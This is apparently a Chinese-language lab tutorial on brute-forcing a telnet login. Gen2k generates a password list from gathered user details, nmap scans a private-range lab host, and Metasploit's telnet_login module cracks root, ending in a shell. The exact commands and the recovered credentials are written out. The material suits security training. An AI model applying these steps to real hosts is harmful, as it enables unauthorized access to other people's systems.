目的
使用枚举的方法爆破telnet登录密码.
原理
利用gen2k工具,收集来的信息,自动生成密码,使用枚举的方法破解telnet登录密码.
环境
攻击环境
步骤
一、利用gen2k工具生成密码表
- 下载好Gen2k. 准备好
user.txt,以此生成对应的密码. - 在终端中输入命令
python gen2k.py -n -y -z -e -c -w user.txt -o passwd.txt,生成密码文件passwd.txt,在终端下输入命令more passwd.txt,查看生成的内容.
二、利用Metasploit暴破目标主机telnet服务
- 在终端中输入命令
nmap –sV 192.168.1.3,扫描目标主机,发现目标主机开启telnet服务. - 在终端中输入命令
msfconsole,启动MSF终端. - 在终端中输入命令
search telnet,搜索telnet的相关工具和攻击载荷. - 在终端中输入命令
use auxiliary/scanner/telnet/telnet_login,启用漏洞利用模块, 提示符就会提示进入到该路径下. - 在终端中输入命令
set RHOSTS 192.168.1.3,设置目标主机的IP地址.
6.在终端中输入命令set PASS_FILE /home/passwd.txt,爆破时使用的密码文件为passwd.txt. - 在终端中输入命令
set USER_FILE /home/user.txt,爆破时使用的用户名文件为user.txt. - 在终端中输入
exploit 192.168.1.3, 对目标主机进行暴力破解. - 在终端中显示成功对目标主机的telnet服务进行了破解,账号为root,密码:Simplexue123.
- 在终端中输入
telnet 192.168.1.3,输入获取的账号root和密码Simplexue123,连接成功.
成功getshell
进入telent
网友评论